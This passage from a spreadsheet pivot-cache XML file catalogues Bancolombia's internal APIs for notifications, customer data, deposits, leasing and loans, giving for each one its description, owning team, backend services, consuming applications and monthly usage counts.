    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasPYME/V1.0"/>
    <m/>
    <s v="LimitsCreditExhibition_NU0114001"/>
    <m/>
    <n v="2"/>
    <n v="1"/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-20T16:37:53"/>
    <s v="Sms Notifications"/>
    <n v="100"/>
    <s v="Sms Notifications - Send Sms Message"/>
    <n v="100"/>
    <s v="sms-notifications-send-sms-message"/>
    <s v="La Api permite realizar el enví­o de mensajes SMS a través del proveedor de delivery Inalambria. Este servicio está enfocado a consumidores transaccionales que realizan enví­o de mensajes a partir de la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes. "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="EnvioSmsInalambria/V1.0"/>
    <m/>
    <s v="BIZAGIAC_AW1285001 _x000d__x000a_ APM_AW1097001 _x000d__x000a_ PortalAutogestionPyme_AW1287 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ LoansApproval_NU107001 _x000d__x000a_ prueba _x000d__x000a_ CuponPagosDigital_AW0214001 _x000d__x000a_ Inversi_NU0160001"/>
    <n v="103245"/>
    <n v="90069"/>
    <n v="84307"/>
    <n v="94873"/>
    <n v="120539"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Solicitud De Autorizacion"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite a los diferentes sistemas de Bancolombia solicitar que se autorice a un perfil de usuario sobre un archivo existente en una ruta ifs del iSeries"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Transversales iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="SEGRAUTOBJ (AS400)"/>
    <s v="AW01065 _x000d__x000a_SU2 _x000d__x000a_SUF _x000d__x000a_ALM _x000d__x000a_NU0001 _x000d__x000a_AW1078 _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-11T10:53:04"/>
    <s v="Sufi Loan"/>
    <n v="130"/>
    <s v="Sufi Loan - Loans Information"/>
    <n v="104"/>
    <s v="loans-information"/>
    <s v="La API Sufi Loan - Loans Information tiene como objetivo obtener todas las obligaciones o sus detalles.  Esta posee las siguientes operaciones: --- - Consulta de obligaciones básica: Todas las obligaciones a partir de un documentId - Consulta de obligaciones detallada: Detalles de una obligación a partir de su loanId - Consulta de obligaciones por alianza: Consulta todas las obligaciones como la consulta de obligaciones básica además de filtrar por su respectiva alianza."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="DesembolsosSufi_AW1097001 _x000d__x000a_ Monitoreo_AW1097001 _x000d__x000a_ adaptadorSufi_ISSU20003 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="175315"/>
    <n v="264901"/>
    <n v="292700"/>
    <n v="308208"/>
    <n v="396773"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-28T13:49:21"/>
    <s v="Sufi Loan"/>
    <n v="130"/>
    <s v="Sufi Loan - Transactions"/>
    <n v="120"/>
    <s v="transactions"/>
    <s v="La API Sufi Loan - Transactions tiene como objetivo entregar información correspondiente a los movimientos o transacciones realizadas por pagos a una obligación puntual obtenida por el cliente.  Esta posee las siguiente operación: --- - Consulta de Transacciones: Todas los movimientos de una obligación a partir de un loanId"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="DesembolsosSufi_AW1097001 _x000d__x000a_ Monitoreo_AW1097001 _x000d__x000a_ adaptadorSufi_ISSU20003 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <m/>
    <n v="4"/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-06-23T15:29:13"/>
    <s v="Tec-Commerce Portal"/>
    <n v="160"/>
    <s v="Tec - commerce portal channel - customer information"/>
    <n v="120"/>
    <s v="tec-commerce-portal-channel-customer-information"/>
    <s v="Esta API permitirá exponer las diferentes consultas que desde el canal portal comercio se requieren para la administración del canal desde el Modulo Administrativo u otros canales o consumidores que requieran acceder a la información del canal y a sus diferentes funcionalidades."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Portal Comercio"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Modulo Administrativo Canales Digitales_AW1204 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-11-20T18:05:31"/>
    <s v="Tec-Payments ACH Fulfillment"/>
    <n v="102"/>
    <s v="Tec - Customer - Enrollment"/>
    <n v="102"/>
    <s v="tec-customer-enrollment"/>
    <s v="El API  permite vincular las cuentas activas de ahorro y corriente del cliente Bancolombia con el  número de celular para realizar las transferencias Inmediatas en ACH en Lí­nea."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="CapaGestionCanal_NU0014001"/>
    <n v="102826"/>
    <n v="76379"/>
    <n v="508791"/>
    <n v="778265"/>
    <n v="910223"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-10-08T17:28:04"/>
    <s v="Tec - Customer"/>
    <n v="121"/>
    <s v="Tec - Customer - General Information"/>
    <n v="100"/>
    <s v="tec-customer-general-information"/>
    <s v="API que permite consultar la informacion general de un cliente sea persona natural o jurí­dica."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="RecuperarDatosCliente/V4.0"/>
    <s v="MDM"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ plink_AW1206001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ APM_NU0032001 _x000d__x000a_ LifeCoach_AW1240001 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ TabotWhatsapp_AW1165 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ NEQUIMDM_AW1011 _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="54"/>
    <n v="8"/>
    <n v="296"/>
    <n v="5470"/>
    <n v="8549"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-07-09T03:14:34"/>
    <s v="Tec - Customer"/>
    <n v="121"/>
    <s v="Tec - Customer - Obtain Payment Methods"/>
    <n v="104"/>
    <s v="tec-customer-obtain-payment-methods"/>
    <s v="Permite obtener el grupo de productos desde los cuales se puede realizar el pago"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="ConsultaProductoDepositos/V1.0"/>
    <s v="Bankvision - BVC_Matriz MIT_ISBVC0009"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ plink_AW1206001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ APM_NU0032001 _x000d__x000a_ LifeCoach_AW1240001 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ TabotWhatsapp_AW1165 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ NEQUIMDM_AW1011 _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="193196"/>
    <n v="135705"/>
    <n v="875656"/>
    <n v="1629054"/>
    <n v="1694366"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-08T14:48:20"/>
    <s v="Tec - Customer Contact"/>
    <n v="100"/>
    <s v="Tec - Customer - Query Contact Information"/>
    <n v="100"/>
    <s v="tec-customer-query-contact-information"/>
    <s v="API que permite realizar la consulta de información del contacto del cliente, tal como: dirección de residencia, dirección de oficina, teléfono fijo, teléfono móvil, email, entre otros."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="ConsultaDatosContactoCliente/V1.0"/>
    <s v="MDM"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ plink_AW1206001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ GestionaNegocios_AW1302001"/>
    <n v="5057"/>
    <n v="6090"/>
    <n v="50755"/>
    <n v="102055"/>
    <n v="135621"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-10-08T17:28:04"/>
    <s v="Tec - Customer"/>
    <n v="121"/>
    <s v="Tec - Customer - Query Keys"/>
    <n v="100"/>
    <s v="tec-customer-query-keys"/>
    <s v="API que permite consultar una llave de identificación especifica del cliente según una identificación de entrada. Es decir, que de un tipo y número de identificación puedo obtener la llave MDM del cliente o en otro caso, a partir de la llave MDM puedo consultar cual es la llave CIF. Permite consultar la llave especí­fica a partir de: la llave MDM, llave CIF, llave CRM y el tipo/número de identificación. Y las llaves resultantes pueden ser: la llave MDM, llave CIF, llave CRM."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="ConsultaLlaveroCliente/V1.0"/>
    <s v="MDM"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ plink_AW1206001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ APM_NU0032001 _x000d__x000a_ LifeCoach_AW1240001 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ TabotWhatsapp_AW1165 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ NEQUIMDM_AW1011 _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="136592"/>
    <n v="100404"/>
    <n v="586994"/>
    <n v="906170"/>
    <n v="899335"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-01-07T16:15:55"/>
    <s v="Tec - Customer Commercial Data"/>
    <n v="101"/>
    <s v="Tec - Customer Commercial Data - Query management"/>
    <n v="101"/>
    <s v="tec-customer-commercial-data-query-management"/>
    <s v="API que permite realizar la consulta de la gestión comercial del cliente. Esta información esta divida en dos operaciones de la siguiente forma:  Gestión comercial: permite la consulta de información para realizar la gestión comercial al cliente, tal como: rol, responsable comercial del cliente, oficina de vinculación, nicho de mercado, segmento, subsegmento, entre otros. Gestión comercial ECA (equipo comercial amplificado): permite proveer información de otras relaciones comerciales existentes entre el cliente y los negocios especializados de moneda extranjera, inversión, fiduciaria, Leasing, etc. Tanto para Personas de las bancas personas y pymes, como para personas de la banca de empresas y gobierno."/>
    <s v="INFORMACION"/>
    <s v="Analitica y Big Data"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="ConsultaGestionComercialCliente/V1.0"/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ GestionaNegocios_AW1302001"/>
    <n v="5780"/>
    <n v="4793"/>
    <n v="33617"/>
    <n v="47380"/>
    <n v="39280"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-13T15:44:49"/>
    <s v="Tec - Leasing"/>
    <n v="111"/>
    <s v="Tec - Customer Leasing - Information"/>
    <n v="100"/>
    <s v="tec-customer-leasing-information"/>
    <s v="El api Tec Customer Leasing - Information permitirá a los consumidores consultar y más adelante modificar información relacionada con los clientes de Leasing."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="2815"/>
    <n v="1721"/>
    <n v="10795"/>
    <n v="21586"/>
    <n v="23472"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-01-20T11:43:10"/>
    <s v="Tec-Customer Personal Data"/>
    <n v="100"/>
    <s v="Tec - Customer Personal Data - Query Information"/>
    <n v="100"/>
    <s v="tec-customer-personal-data-query-information"/>
    <s v="API que permite realizar la consulta de los datos personales del cliente: La información personal básica de un cliente, tales como: tipo documento, número documento, nombre completo, rol, datos de vinculación, entre otros. La información detallada de un cliente, tales como: fecha y ciudad de expedición de documento de identidad, fecha de nacimiento, primer nombre, segundo nombre, primer apellido, segundo apellido, genero, tratamiento del cliente, entre otros."/>
    <s v="INFORMACION"/>
    <s v="Analitica y Big Data"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="ConsultaDatosPersonalesCliente/V1.0"/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ SUID_AW1310 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ GestionaNegocios_AW1302001"/>
    <n v="19758"/>
    <n v="19097"/>
    <n v="167120"/>
    <n v="287284"/>
    <n v="359576"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-18T09:18:16"/>
    <s v="Tec-Accounts"/>
    <n v="110"/>
    <s v="Tec - Deposit - Account Balance"/>
    <n v="110"/>
    <s v="tec-deposit-account-balance"/>
    <s v="Permite la consulta de saldo de todas las cuentas de depósitos de personas: Ahorros y corrientes."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <s v="ConsultaSaldosCuentasDepositos/V1.0"/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ NEQUICUEDEP_AW1011 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ PORTALCOBRANZA_AW1294001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-28T16:52:18"/>
    <s v="Tec - Deposits"/>
    <n v="107"/>
    <s v="Tec - Deposit - Monetary Affectation"/>
    <n v="101"/>
    <s v="tec-deposit-monetary-affectation"/>
    <s v="Permite realizar la transaccionalidad de Cuentas de Ahorro/Corrientes."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <s v="AfectacionMonetariaDepositos/V1.0"/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-07-07T03:52:13"/>
    <s v="Tec - Deposits"/>
    <n v="107"/>
    <s v="Tec - Deposit - Transference"/>
    <n v="106"/>
    <s v="tec-deposit-transference"/>
    <s v="Permite realizar un pago con transferencia entre cuentas de depositos de clientes Bancolombia."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="PagoConTransferencia/V1.0"/>
    <s v="Modulo de Administración de Tarjetas (MAT)_Tarjeta débito_ISMAT0001"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT"/>
    <m/>
    <m/>
    <n v="1749"/>
    <n v="2548"/>
    <n v="5572"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-09-02T00:11:00"/>
    <s v="Tec - Email Notifications"/>
    <n v="101"/>
    <s v="Tec - Email Notifications - Send"/>
    <n v="101"/>
    <s v="tec-email-notifications-send"/>
    <s v="API que permite el enví­o de correo electrónico básico o en diferentes formatos (con clave, con pdf, con adjunto base64, encriptado). A la fecha el servicio tiene como proveedor a Masivian. A continuación, se nombran estas funcionalidades: â€¢ Enví­o correo electrónico con un contenido básico.  En esta segunda versión se agrega se agrega esta operación de manera que se tiene que deprecar del servicio â€œGwe-Notification-mail-basicâ€? y migrar a esta nueva api los consumidores. â€¢ Enví­o correo electrónico con adjunto pdf generado por el banco y puesto en una ruta SFTP para que el proveedor de correo (Masivian) lo adjunte al mensaje. Pendiente por apificar y deprecar del servicio. â€¢ Enví­o correo electrónico con adjunto pdf generado por el banco y puesto en una ruta SFTP para que el proveedor de correo (Masivian) lo proteja con contraseña y lo adjunte al mensaje. Pendiente por apificar. â€¢ Enví­o correo electrónico con adjunto pdf generado por el proveedor de correo (Masivian) utilizando una plantilla previamente cargada en su sistema. Pendiente por apificar â€¢ Enví­o correo electrónico con adjunto pdf generado y protegido con clave por el proveedor de correo (Masivian) utilizando una plantilla previamente cargada en su sistema. Pendiente por apificar. â€¢ Enví­o correo electrónico con adjunto enviado en base64 en el mensaje xml, para que el proveedor de correo (Masivian) lo decodifique y lo adjunte como pdf en el mensaje. â€¢ Enví­o correo electrónico con adjunto enviado en base64 en el mensaje xml, para que el proveedor de correo (Masivian) lo decodifique, lo proteja con clave y lo adjunte como pdf en el mensaje. NOTA\: Al momento de especificar esta API, ya existí­a una con el nombre de â€œGwe-Notication-mail-basicâ€?, acoplada a la funcionalidad â€œenví­o correo básicoâ€?, adicional a lo anterior carece de un campo messageId y esto evita su trazabilidad en caso de incidente por las razones anteriores no se agregarán mas operaciones a esa API."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Masivia"/>
    <s v="MACINV-RPA20190002_AW1172001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BIZAGIAC_AW1285001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ Historia del Cliente_NU0090001"/>
    <n v="496"/>
    <n v="1138"/>
    <n v="2844"/>
    <n v="5708"/>
    <n v="8033"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-13T15:44:49"/>
    <s v="Tec - Leasing"/>
    <n v="111"/>
    <s v="Tec - Financial Leasing - Operation Information"/>
    <n v="100"/>
    <s v="tec-financial-leasing-operation-information"/>
    <s v="El API Tec - Financial Leasing  Operation Information permitirá a los consumidores consultar diferente información relacionada con las operaciones de leasing financiero en estados de anticipo, definitivos o cancelados."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="3159"/>
    <n v="1921"/>
    <n v="11829"/>
    <n v="24497"/>
    <n v="26708"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-13T15:44:49"/>
    <s v="Tec - Leasing"/>
    <n v="111"/>
    <s v="Tec - Financial Operations - Payments"/>
    <n v="100"/>
    <s v="tec-financial-operations-payments"/>
    <s v="El API Tec Financial Operations Payments permitirá a los consumidores consultar los diferentes pagos: al dí­a, pagos anteriores, pagos futuros o en mora para las operaciones de Leasing Financiero en estado definitiva o en anticipo."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="94"/>
    <n v="67"/>
    <n v="492"/>
    <n v="1098"/>
    <n v="1047"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-13T11:56:33"/>
    <s v="Fund Administration"/>
    <n v="102"/>
    <s v="Tec - Fund Administration - Consolidated Balances"/>
    <n v="101"/>
    <s v="tec-fund-administration-consolidated-balances"/>
    <s v="Esta API permite consultar el saldo consolidado de los fondos de inversión tanto de valores como de fiduciaria de un cliente del grupo Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaFondos/V1.0"/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="4454"/>
    <n v="2696"/>
    <n v="18322"/>
    <n v="35797"/>
    <n v="49180"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-13T11:56:33"/>
    <s v="Fund Administration"/>
    <n v="102"/>
    <s v="Tec - Fund Administration - Transactions"/>
    <n v="101"/>
    <s v="tec-fund-administration-transactions"/>
    <s v="La API permite consultar los movimientos detallados de los fondos de inversión del Grupo Bancolombia, ya sea de Valores o Fiduciaria."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaFondos/V1.0"/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="87"/>
    <n v="38"/>
    <n v="299"/>
    <n v="568"/>
    <n v="851"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-11-27T17:37:23"/>
    <s v="Tec - Leasing"/>
    <n v="111"/>
    <s v="Tec - Leasing Notification - Send Reports"/>
    <n v="101"/>
    <s v="tec-leasing-notification-send-reports"/>
    <s v="El API permitirá a los consumidores hacer solicitudes al back de leasing para la generación y enví­o de algún tipo de reporte de operaciones que por su volumen de información deba ser entregado en buzón seguro."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="125"/>
    <n v="69"/>
    <n v="444"/>
    <n v="1179"/>
    <n v="1473"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-06-17T18:18:30"/>
    <s v="Tec - Loans"/>
    <n v="151"/>
    <s v="Tec - Loans - Enquiry"/>
    <n v="114"/>
    <s v="tec-loans-enquiry"/>
    <s v="Api que permite la consulta de los préstamos que tenga un cliente o un convenio empresarial, la consulta detallada y los movimientos de un préstamo en particular."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaInformacionPrestamos/V2.0"/>
    <s v="STI - Sistema Transaccional de Integración_Sistema Transaccional de Integración_ISSTI0002"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PortalLibranzas_AW0360007"/>
    <n v="32187"/>
    <n v="26144"/>
    <n v="43628"/>
    <n v="290979"/>
    <n v="439408"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-03-17T11:46:26"/>
    <s v="Tec - Loans"/>
    <n v="151"/>
    <s v="Tec - Loans - Loan Applications"/>
    <n v="100"/>
    <s v="tec-loans-loan-applications"/>
    <s v="En su versión inicial, esta API expone capacidades que permiten consultar los detalles relacionados con solicitudes de crédito radicadas, así­ como actualizar el estado de éstas, haciendo posible, en parte, la gestión de este proceso previo al desembolso del crédito."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="SolicitudDeCredito/V1.0_x000a_SolicitudDeCredito/Enlace/V1.0"/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PortalLibranzas_AW0360007"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-06-04T17:26:15"/>
    <s v="Tec - Loans"/>
    <n v="151"/>
    <s v="Tec - Loans - Maximum Loan Amount"/>
    <n v="103"/>
    <s v="tec-loans-maximum-loan-amount"/>
    <s v="Esta API expone un método que permite obtener el límite que un cliente tiene asociado a productos crediticios entre los cuales no se consideran ni Leasing ni tarjetas de crédito. "/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaDatosCartera/V2.0"/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PortalLibranzas_AW0360007"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-03-17T11:46:26"/>
    <s v="Tec - Loans"/>
    <n v="151"/>
    <s v="Tec - Loans Collaterals"/>
    <n v="103"/>
    <s v="tec-loans-collaterals"/>
    <s v="Esta API permite consultar la información general de las garantí­as asociadas a un cliente"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaDatosCartera/V2.0"/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
